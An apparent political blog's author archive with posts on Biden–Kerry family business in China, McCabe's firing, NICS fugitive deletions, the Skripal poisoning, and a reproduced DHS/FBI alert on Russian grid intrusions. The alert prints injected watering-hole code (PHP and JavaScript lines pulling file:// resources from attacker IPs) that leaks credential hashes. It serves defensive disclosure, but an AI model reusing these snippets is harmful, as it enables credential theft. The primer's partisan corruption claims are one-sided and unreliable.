Keep this post in your bookmarks as we enter into the 2020 general election….
Primer:
1. China plants industrial espionage operatives in the U.S. that steal government contract secrets and sell them back to China. FBI caught at least one.
2. Through cyber espionage, China has stolen much of the F-35 technology, more than 50 terabytes.
3. John Kerry and Joe Biden did exactly the same thing as Hillary…sold access for money while exploiting it all as diplomatic missions with the title(s) of bi-lateral agreements.
4. Subpoena former Treasury Secretary Jack Lew and ask him about the CFIUS approvals of Chinese back enterprises. We may surely need to go back to former Treasury Secretary, Tim Geithner, did he set the table for all this with Obama’s approval creating that ‘Asia Pivot‘?
5. What does Congress know about foreign investments and when do they know it? They get reports, but who is asking questions, anyone?
NYP: Joe Biden and John Kerry have been pillars of the Washington establishment for more than 30 years. Biden is one of the most popular politicians in our nation’s capital.
His demeanor, sense of humor, and even his friendly gaffes have allowed him to form close relationships with both Democrats and Republicans. His public image is built around his “Lunch Bucket Joe” persona. As he reminds the American people on regular occasions, he has little wealth to show for his career, despite having reached the vice presidency.
One of his closest political allies in Washington is former senator and former Secretary of State John Kerry. “Lunch Bucket Joe” he ain’t; Kerry is more patrician than earthy. But the two men became close while serving for several decades together in the US Senate. The two “often talked on matters of foreign policy,” says Jules Witcover in his Biden biography.
So their sons going into business together in June 2009 was not exactly a bolt out of the blue.
But with whom their sons cut lucrative deals while the elder two were steering the ship of state is more of a surprise.
What Hunter Biden, the son of America’s vice president, and Christopher Heinz, the stepson of the chairman of the Senate Committee on Foreign Relations (later to be secretary of state), were creating was an international private equity firm. It was anchored by the Heinz family alternative investment fund, Rosemont Capital. The new firm would be populated by political loyalists and positioned to strike profitable deals overseas with foreign governments and officials with whom the US government was negotiating.
Hunter Biden, Vice President Joe Biden’s youngest son, had gone through a series of jobs since graduating from Yale Law School in 1996, including the hedge-fund business.
By the summer of 2009, the 39-year-old Hunter joined forces with the son of another powerful figure in American politics, Chris Heinz. Senator John Heinz of Pennsylvania had tragically died in a 1991 airplane crash when Chris was 18. Chris, his brothers, and his mother inherited a large chunk of the family’s vast ketchup fortune, including a network of investment funds and a Pennsylvania estate, among other properties. In May 1995, his mother, Teresa, married Senator John Kerry of Massachusetts. That same year, Chris graduated from Yale, and then went on to get his MBA from Harvard Business School.
Joining them in the Rosemont venture was Devon Archer, a longtime Heinz and Kerry friend.
The three friends established a series of related LLCs. The trunk of the tree was Rosemont Capital, the alternative investment fund of the Heinz Family Office. Rosemont Farm is the name of the Heinz family’s 90-acre estate outside Fox Chapel, Pennsylvania.
The small fund grew quickly. According to an email revealed as part of a Securities and Exchange Commission investigation, Rosemont described themselves as “a $2.4 billion private equity firm co-owned by Hunter Biden and Chris Heinz,” with Devon Archer as “Managing Partner.”
The partners attached several branches to the Rosemont Capital trunk, including Rosemont Seneca Partners, LLC, Rosemont Seneca Technology Partners, and Rosemont Realty.
Of the various deals in which these Rosemont entities were involved, one of the largest and most troubling concerns was Rosemont Seneca Partners.
Rather than set up shop in New York City, the financial capital of the world, Rosemont Seneca leased space in Washington, DC. They occupied an all-brick building on Wisconsin Avenue, the main thoroughfare of exclusive Georgetown. Their offices would be less than a mile from John and Teresa Kerry’s 23-room Georgetown mansion, and just two miles from both Joe Biden’s office in the White House and his residence at the Naval Observatory.
Over the next seven years, as both Joe Biden and John Kerry negotiated sensitive and high-stakes deals with foreign governments, Rosemont entities secured a series of exclusive deals often with those same foreign governments.
Some of the deals they secured may remain hidden. These Rosemont entities are, after all, within a private equity firm and as such are not required to report or disclose their financial dealings publicly.
Some of their transactions are nevertheless traceable by investigating world capital markets. A troubling pattern emerges from this research, showing how profitable deals were struck with foreign governments on the heels of crucial diplomatic missions carried out by their powerful fathers. Often those foreign entities gained favorable policy actions from the United States government just as the sons were securing favorable financial deals from those same entities.
Nowhere is that more true than in their commercial dealings with Chinese government-backed enterprises.
Rosemont Seneca joined forces in doing business in China with another politically connected consultancy called the Thornton Group. The Massachusetts-based firm is headed by James Bulger, the nephew of the notorious mob hitman James “Whitey” Bulger. Whitey was the leader of the Winter Hill Gang, part of the South Boston mafia. Under indictment for 19 murders, he disappeared. He was later arrested, tried, and convicted.
James Bulger’s father, Whitey’s younger brother, Billy Bulger, serves on the board of directors of the Thornton Group. He was the longtime leader of the Massachusetts state Senate and, with their long overlap by state and by party, a political ally of Massachusetts Senator John Kerry.
Less than a year after opening Rosemont Seneca’s doors, Hunter Biden and Devon Archer were in China, having secured access at the highest levels. Thornton Group’s account of the meeting on their Chinese-language website was telling: Chinese executives “extended their warm welcome” to the “Thornton Group, with its US partner Rosemont Seneca chairman Hunter Biden (second son of the now Vice President Joe Biden).”
The purpose of the meetings was to “explore the possibility of commercial cooperation and opportunity.” Curiously, details about the meeting do not appear on their English-language website.
Also, according to the Thornton Group, the three Americans met with the largest and most powerful government fund leaders in China — even though Rosemont was both new and small.
The timing of this meeting was also curious. It occurred just hours before Hunter Biden’s father, the vice president, met with Chinese President Hu in Washington as part of the Nuclear Security Summit.
There was a second known meeting with many of the same Chinese financial titans in Taiwan in May 2011. For a small firm like Rosemont Seneca with no track record, it was an impressive level of access to China’s largest financial players. And it was just two weeks after Joe Biden had opened up the US-China strategic dialogue with Chinese officials in Washington.
On one of the first days of December 2013, Hunter Biden was jetting across the Pacific Ocean aboard Air Force Two with his father and daughter Finnegan. The vice president was heading to Asia on an extended official trip. Tensions in the region were on the rise.
The American delegation was visiting Japan, China, and South Korea. But it was the visit to China that had the most potential to generate conflict and controversy. The Obama administration had instituted the “Asia Pivot” in its international strategy, shifting attention away from Europe and toward Asia, where China was flexing its muscles.
For Hunter Biden, the trip coincided with a major deal that Rosemont Seneca was striking with the state-owned Bank of China. From his perspective, the timing couldn’t have been better.
Vice President Biden, Hunter Biden and Finnegan arrived to a red carpet and a delegation of Chinese officials. Greeted by Chinese children carrying flowers, the delegation was then whisked to a meeting with Vice President Li Yuanchao and talks with President Xi Jinping.
Hunter and Finnegan Biden joined the vice president for tea with US Ambassador Gary Locke at the Liu Xian Guan Teahouse in the Dongcheng District in Beijing. Where Hunter Biden spent the rest of his time on the trip remains largely a mystery. There are actually more reports of his daughter Finnegan’s activities than his.
What was not reported was the deal that Hunter was securing. Rosemont Seneca Partners had been negotiating an exclusive deal with Chinese officials, which they signed approximately 10 days after Hunter visited China with his father. The most powerful financial institution in China, the government’s Bank of China, was setting up a joint venture with Rosemont Seneca.
The Bank of China is an enormously powerful financial institution. But the Bank of China is very different from the Bank of America. The Bank of China is government-owned, which means that its role as a bank blurs into its role as a tool of the government. The Bank of China provides capital for “China’s economic statecraft,” as scholar James Reilly puts it. Bank loans and deals often occur within the context of a government goal.
Rosemont Seneca and the Bank of China created a $1 billion investment fund called Bohai Harvest RST (BHR), a name that reflected who was involved. Bohai (or Bo Hai), the innermost gulf of the Yellow Sea, was a reference to the Chinese stake in the company. The “RS” referred to Rosemont Seneca. The “T” was Thornton.
The fund enjoyed an unusual and special status in China. BHR touted its “unique Sino-US shareholding structure” and “the global resources and network” that allowed it to secure investment “opportunities.” Funds were backed by the Chinese government.
In short, the Chinese government was literally funding a business that it co-owned along with the sons of two of America’s most powerful decision makers.
The partnership between American princelings and the Chinese government was just a beginning. The actual investment deals that this partnership made were even more problematic. Many of them would have serious national security implications for the United States.
In 2015, BHR joined forces with the automotive subsidiary of the Chinese state-owned military aviation contractor Aviation Industry Corporation of China (AVIC) to buy American “dual-use” parts manufacturer Henniges.
AVIC is a major military contractor in China. It operates “under the direct control of the State Council” and produces a wide array of fighter and bomber aircraft, transports, and drones — primarily designed to compete with the United States.
The company also has a long history of stealing Western technology and applying it to military systems. The year before BHR joined with AVIC, the Wall Street Journal reported that the aviation company had stolen technologies related to the US F-35 stealth fighter and incorporated them in their own stealth fighter, the J-31. AVIC has also been accused of stealing US drone systems and using them to produce their own.
In September 2015, when AVIC bought 51 percent of American precision-parts manufacturer Henniges, the other 49 percent was purchased by the Biden-and-Kerry-linked BHR.
Henniges is recognized as a world leader in anti-vibration technologies in the automotive industry and for its precise, state-of-the-art manufacturing capabilities. Anti-vibration technologies are considered “dual-use” because they can have a military application, according to both the State Department and Department of Commerce.
The technology is also on the restricted Commerce Control List used by the federal government to limit the exports of certain technologies. For that reason, the Henniges deal would require the approval of the Committee on Foreign Investment in the United States (CFIUS), which reviews sensitive business transactions that may have a national security implication.
According to BHR internal documents, the Henniges deal included “arduous and often-times challenging negotiations.” The CFIUS review in 2015 included representatives from numerous government agencies including John Kerry’s State Department.
The deal was approved in 2015.
Excerpted with permission from “Secret Empires: How the American Political Class Hides Corruption and Enriches Family and Friends,” by Peter Schweizer, published by Harper Collins. The book goes on sale March 20.
Author Archives: Denise Simon
Details on the Firing of FBI Dep. Director Andrew McCabe
Just after midnight Saturday, President Donald Trump reacted to the news in a Twitter message:
“Andrew McCabe FIRED, a great day for the hard working men and women of the FBI – A great day for Democracy,” the president wrote, “Sanctimonious James Comey was his boss and made McCabe look like a choirboy. He knew all about the lies and corruption going on at the highest levels of the FBI!” More detail here including the timeline with former FBI Director James Comey.
The termination, which was triggered by internal reviews and comes a little more than day before McCabe was set to retire, sparks a war of words between McCabe and President Donald Trump.
Politico: Attorney General Jeff Sessions fired former FBI Deputy Director Andrew McCabe Friday night, dismissing the longtime bureau veteran who had been publicly pilloried by President Donald Trump and sparking a new war of words between McCabe and Trump.
Sessions said the firing — carried out a little more than a day before McCabe was set to retire from the FBI — was triggered by internal reviews that concluded McCabe violated Justice Department policies and was not forthcoming with investigators probing FBI actions before the 2016 presidential election.
Justice Department officials determined that “McCabe had made an unauthorized disclosure to the news media and lacked candor — including under oath — on multiple occasions,” the attorney general said in a statement.
“The FBI expects every employee to adhere to the highest standards of honesty, integrity, and accountability,” Sessions added.
McCabe quickly lashed back Friday, linking the firing to the repeated public flogging he faced from Trump. The former FBI No. 2 also tied his dismissal to the fact that he can support former FBI Director James Comey’s account that he was fired because of an unwillingness to shut down the investigation into the Trump campaign’s alleged ties to Russia.
“Here is the reality: I am being singled out and treated this way because of the role I played, the actions I took, and the events I witnessed in the aftermath of the firing of James Comey,” McCabe said in a statement. “The release of this report was accelerated only after my testimony to the House Intelligence Committee revealed that I would corroborate former Director Comey’s accounts of his discussions with the President.”
“The fact that [Trump] has said all these things about me, he’s made all these attacks, he’s gone on and on — you can’t dismiss it, that’s the problem,” McCabe told POLITICO in an interview earlier this month. “That’s why presidents don’t typically attack senior executives in the FBI, because they would never even want to create the impression that that sort of improper influence could be taking place.”
Shortly after midnight, Trump hit back, tweeting: “Andrew McCabe FIRED, a great day for the hard working men and women of the FBI – A great day for Democracy. Sanctimonious James Comey was his boss and made McCabe look like a choirboy. He knew all about the lies and corruption going on at the highest levels of the FBI!”
Prominent Democratic lawmakers expressed skepticism about Sessions’ decision, but seemed cautious about denouncing the action until Inspector General Michael Horowitz’s review is released. Many Democrats have praised Horowitz, whose office prepared the report that appears to have harshly criticized McCabe.
“In the absence of the IG report, it’s impossible to evaluate the merits of this harsh treatment of a 21-year FBI professional. That it comes after the President urged the DOJ to deprive McCabe of his pension, and after his testimony, gives the action an odious taint,” the top Democrat on the House Intelligence Committee, Adam Schiff of California, tweeted.
“I am going to reserve judgment on Mr. McCabe’s conduct until the Inspector General completes his report,” the House Judiciary Committee’s ranking Democrat, Jerrold Nadler of New York, said. “But I am certain that President Trump has attacked the reputation of a career public servant, and his wife, and the rest of the leadership of the Department of Justice—and those attacks leave us all questioning whether the Attorney General has made the right decision.”
By contrast, Rep. Lee Zeldin (R-N.Y.) quickly embraced Sessions’ move.
“Decisive, appropriate, timely action by @jeffsessions to fire Andrew McCabe. DOJ/FBI are legendary, historic, important agencies filled w/amazing men & women held to highest standards,” Zeldin wrote on Twitter. “McCabe was a ringleader of rogue actors who were a shameful exception at top; not the norm.”
Mark Meadows, the leader of the conservative House Freedom Caucus, said that McCabe’s termination showed the need to add another special counsel to probe the FBI.
“This decision is not surprising based on information that continues to unfold on a daily basis,” Meadows said.
The embattled FBI deputy, who was due to officially retire on Sunday, had stepped down in January after facing repeated public and private rebukes from the president. Trump criticized his handling of the Hillary Clinton email investigation and accused McCabe of bias, citing his wife’s political ties to a prominent Democrat.
McCabe has been at the center of a Justice Department inspector general examination of the bureau’s activities prior to the 2016 election, including the investigation into the Clinton email matter. The FBI’s Office of Professional Responsibility had recommended that McCabe be fired, citing findings from the Justice Department’s inspector general’s report, which is expected to be released within weeks.
Sessions’ statement did not detail the precise allegations against McCabe. However, the fired FBI official’s own statement and text messages released by the Senate Judiciary Committee indicate that investigators concluded he ordered the disclosure of information to a Wall Street Journal reporter about an ongoing investigation into the Clinton Foundation.
As McCabe was under fire over donations his wife received for her Democratic campaign for the Virginia Senate, he indicated he had pressed to keep the foundation-related probe advancing even as Justice Department officials questioned its merit.
“This entire investigation stems from my efforts, fully authorized under FBI rules, to set the record straight on behalf of the Bureau, and to make clear that we were continuing an investigation that people in DOJ opposed,” McCabe said. The disclosure “was not a secret, it took place over several days, and others, including the Director, were aware of the interaction with the reporter,” the former FBI No. 2 added.
McCabe has pushed back at the timing of the inspector general’s report, suggesting that Trump’s frequent criticism of him has driven the speed with which the investigation concluded with a recommendation to terminate him.
“I have never before seen the type of rush to judgment and rush to summary punishment that we have witnessed in this case,” McCabe’s attorney Michael Bromwich said in a statement. ” This is simply not the way such matters are generally handled in the DOJ or the FBI. It is deeply disturbing.”
The president of the FBI Agents Association, Thomas O’Connor, issued a statement Friday night that appeared to express concern that politics may have influenced McCabe’s dismissal.
“While the FBIAA does not comment on personnel matters, the Association remains fully committed to ensuring that every FBIAA member is provided appropriate procedural protections. The FBIAA also strongly believes that personnel decisions should never be politicized,” O’Connor said.
Sessions’ statement indicated that the firing was also endorsed by the Justice Department’s top career official, Associate Deputy Attorney General Scott Schools. The statement did not indicate why the disciplinary process, which can often take more than a year, appears to have been dramatically accelerated in McCabe’s case.
After stepping down in January, McCabe went on “terminal leave,” intending to remain on the government payroll until his planned retirement on March 18. The firing is likely to cost McCabe hundreds of thousands of dollars by rendering McCabe ineligible for his full government pension and by delaying his right to any payout for almost seven years. Legal experts say McCabe’s options to challenge the firing are few because most FBI employees have little legal recourse against attempts to punish them over alleged misconduct.
A spokeswoman for McCabe declined to comment Friday night on whether he is planning a lawsuit.
McCabe told POLITICO earlier this month that he was “essentially removed from my job” in January following information “shared with” Christopher Wray, the FBI’s current director, “before the investigation was concluded.”
“I refused to serve in any other capacity other than deputy, and so I left on terminal leave,” McCabe said. Trump announced in June that he would nominate Wray to replace Comey. Wray took over the job in August, after being confirmed by the Senate.
Trump had questioned McCabe’s impartiality, citing the fact that his wife received funds from then-Virginia Gov. Terry McAuliffe, a Democrat and longtime political ally of Clinton, in a failed bid for the State Legislature in 2015.
“How can FBI Deputy Director Andrew McCabe, the man in charge, along with leakin’ James Comey, of the Phony Hillary Clinton investigation (including her 33,000 illegally deleted emails) be given $700,000 for wife’s campaign by Clinton Puppets during investigation?” Trump tweeted in December. Trump abruptly fired Comey as FBI director in May, saying he was “unable to effectively lead the Bureau.”
In a separate post, Trump added that McCabe was “racing the clock to retire with full benefits.”
Last summer, Trump questioned why Sessions had not already replaced McCabe, whom he labeled a “friend” of Comey’s.
The firing raised concerns about the integrity of the FBI’s examination of possible Russian election meddling in 2016 and potential ties to Trump campaign aides, an investigation that McCabe subsequently took charge of as acting director of the bureau.
McCabe began his bureau career at the New York field office in 1996. In January 2016, under former President Barack Obama, he was appointed to the bureau’s No. 2 position by Comey.
Obama Ordered 500,000 Fugitives Deleted Gun Background Check System
So, while the national student walkout is partisan and in cadence with the democrats, with yet another march is scheduled later this month….there is a bombshell revealed from testimony in a congressional hearing.
On Wednesday, acting FBI deputy director David Bowdich testified during a Senate Judiciary Committee hearing that former President Barack Obama’s Department of Justice forced the FBI to delete over 500,000 fugitives, who had outstanding arrest warrants, from the National Instant Criminal Background Check System (NICS).
“It’s my understanding that under federal law fugitives cannot legally purchase or possess guns,” Senator Dianne Feinstein (D-CA) began. “We’ve heard from local law enforcement that the Justice Department has issued a memo that forced the FBI NICS background check database to drop more than 500,000 names of fugitives with outstanding arrest warrants because it was uncertain whether those fugitives had fled across state lines.”
“Mr. Bowdich, can you describe why this determination was made by the Justice Department?” Feinstein asked.
“That was a decision that was made under the previous administration,” Bowdich replied. “It was the Department of Justice’s Office of Legal Counsel that reviewed the law and believed that it needed to be interpreted so that if someone was a fugitive in a state, there had to be indications that they had crossed state lines.”
Advance the video of the hearing to the 58:51 mark.
According to The Washington Post, the FBI considered any person with an outstanding arrest warrant to be a fugitive. On the other hand, the Bureau of Alcohol Tobacco, Firearms and Explosives defined a fugitive as someone who has an outstanding arrest warrant and has crossed state lines.
That disagreement was settled at the end of Obama’s second term, when the Justice Department’s Office of Legal Counsel sided with the ATF’s interpretation. Under President Donald Trump, the DOJ defined a fugitive as a person who went to another state to dodge criminal prosecution or evade giving testimony in criminal court, and implemented the Office of Legal Counsel’s decision. The decision meant that around half a million fugitives were removed from the National Instant Criminal Background Check System. More here.
CERT/FBI Declaration of Russia Hacking U.S. Infrastructure
US sanctions Russia for election interference, cyberattacks
The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”
CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called “most destructive and costly cyberattack in history.”
The US government unveiled the sanctions Thursday morning, saying they were prompted by Russia’s online propaganda campaign during the US elections, massive hacks of Yahoo and attempted cyberattacks against electrical grids in the US.
The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.
“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”
The sanctions come after an investigation by the Department of Homeland Security and the FBI.
The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a trolling farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.
The Russian embassy didn’t respond to a request for comment.
‘A long-overdue step’
On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.
“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.
Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.
“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”
Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.
The sanctions fall under the Countering America’s Adversaries Through Sanctions Act, which authorizes pushback against “aggression by the governments of Iran, the Russian Federation and North Korea.”
Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.
The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.
Systems Affected
- Domain Controllers
- File Servers
- Email Servers
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.
DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).
For a downloadable copy of IOC packages and associated files, see:
- TA18-074A_TLP_WHITE.csv
- TA18-074A_TLP_WHITE.stix.xml
- MIFR-10127623_TLP_WHITE.pdf
- MIFR-10127623_TLP_WHITE_stix.xml
- MIFR-10128327_TLP_WHITE.pdf
- MIFR-10128327_TLP_WHITE_stix.xml
- MIFR-10128336_TLP_WHITE.pdf
- MIFR-10128336_TLP_WHITE_stix.xml
- MIFR-10128830_TLP_WHITE.pdf
- MIFR-10128830_TLP_WHITE_stix.xml
- MIFR-10128883_TLP_WHITE.pdf
- MIFR-10128883_TLP_WHITE_stix.xml
- MIFR-10135300_TLP_WHITE.pdf
- MIFR-10135300_TLP_WHITE_stix.xml
Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.
Description
Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.
Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1] (link is external)
This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”
Technical Details
The threat actors in this campaign employed a variety of TTPs, including
- spear-phishing emails (from compromised legitimate account),
- watering-hole domains,
- credential gathering,
- open-source and network reconnaissance,
- host-based exploitation, and
- targeting industrial control system (ICS) infrastructure.
Using Cyber Kill Chain for Analysis
DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.
Stage 1: Reconnaissance
The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.
Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.
Stage 2: Weaponization
Spear-Phishing Email TTPs
Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]
Use of Watering Hole Domains
One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.
<img src=”file[:]//62.8.193[.]206/main_logo.png” style=”height: 1px; width: 1px;” /> |
In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:
var i = document.createElement(“img”);
i.src = “file[:]//184.154.150[.]66/ame_icon.png”; i.width = 3; i.height=2; |
Stage 3: Delivery
When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)
In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.
Stage 4: Exploitation
The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.
When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1] (link is external)
Stage 5: Installation
The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.
Establishing Local Accounts
The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.
Amb Haley Nails Russia over Poison Use in UK
The Russian delegation was sitting 3 chairs away from Ambassador Nikki Haley as she slammed Russia for their actions against Britain including the use of poison and the disdainful response by Putin towards Prime Minister Terresa May.
See the secret trial of the chemical weapon from Russia here.
As PM May expels almost 2 dozen Russian diplomats, actually they are spies, one wonders if Britain knew they were in country why they were not expelled previously. A theory has developed that Russian operatives applied the nerve agent, Novachok to the door handles of Skripal’s car. There was the case of the poison telephone:
Accounts of security deficiencies at weapons facilities indicate that, at least for a period in the 1990s, Moscow was not in firm control of its chemical weapons stockpiles or the people guarding them.
When Russian banking magnate Ivan Kivelidi and his secretary died in 1995 from organ failure after a military-grade poison was found on the telephone receiver of his Moscow office, an employee of a state chemical research institute confessed to having secretly supplied the toxin.
In a closed-door trial, Kivelidi’s business partner was convicted of poisoning Kivelidi over a dispute. At the trial, prosecutors said the business partner had obtained the poison, via several intermediaries, from Leonard Rink, an employee of a state chemical research institute known as GosNIIOKhT.
The same institute, according to Vil Mirzayanov, a Soviet chemical weapons scientist who later turned whistleblower, was part of the state chemical weapons programme and helped develop the “Novichok” family of nerve agents that Britain has said was responsible for poisoning Skripal. More here.
BRITAIN today ordered 23 Russian spooks to leave the country within a week in response to the spy poisoning scandal.
Theresa May told MPs that two dozen so-called diplomats who are in fact spies will be kicked out in a bid to stop Vladimir Putin meddling in Britain.
The PM said Russia had shown “contempt and defiance” in the aftermath of an attempt to kill ex-spy Sergei Skripal and warned that the poisoning represented “the unlawful use of force by Russia against the United Kingdom”.
She also confirmed that no ministers or members of the Royal Family will attend this summer’s World Cup in Russia – but stopped short of calling on the England team to pull out of the tournament.
Putin’s officials responded with fury, saying Britain’s tough response was “unacceptable, unjustified and shortsighted”.
But Jeremy Corbyn sparked anger when he suggested that Russia might NOT be behind the attack and compared the investigation to claims about Saddam Hussein’s WMDs.
Mrs May also announced this afternoon:
- New laws to help Britain defend itself from all forms of hostile Russian activity
- Flights and goods from Russia will face extra checks to stop ill-gotten gains entering the UK
- All planned talks with Russian officials, including a visit from the foreign minister, are cancelled
- Assets belonging to Putin’s government will be frozen to stop them being used for wrongdoing
- Suspected spies could be detained at Britain’s borders like terrorists under new powers
- The UK’s allies France, Germany and the US are in full support of her tough stance
The expulsion of 23 Russian spies is the toughest act of its kind for 30 years – and will almost certainly spark a tit-for-tat diplomatic war, with British diplomats likely to be kicked out of Moscow.
Mrs May told the House of Commons: “To those who seek to do us harm, our message is clear – you are not welcome here.”
Blasting Putin’s refusal to respond to her demand for an explanation, the PM said: “It was right to offer Russia the opportunity to provide an explanation.
“But their response has demonstrated complete disdain for the gravity of these events. They have provided no credible explanation that could suggest they lost control of their nerve agent.
“No explanation as to how this agent came to be used in the United Kingdom; no explanation as to why Russia has an undeclared chemical weapons programme in contravention of international law.
“Instead they have treated the use of a military grade nerve agent in Europe with sarcasm, contempt and defiance.
“There is no alternative conclusion other than that the Russian state was culpable for the attempted murder of Mr Skripal and his daughter – and for threatening the lives of other British citizens in Salisbury, including Detective Sergeant Nick Bailey.
“This represents an unlawful use of force by the Russian State against the United Kingdom.”
What we know so far:
- Theresa May announced she would kick out 23 diplomats in the wake of the Sergei Skripal case.
- The Russian Embassy has responded by calling the expulsion ‘unacceptable, unjustified and shortsighted’.
- The Prime Minister also confirmed government officials and members of the Royal family would not be attending the World Cup in Russia.
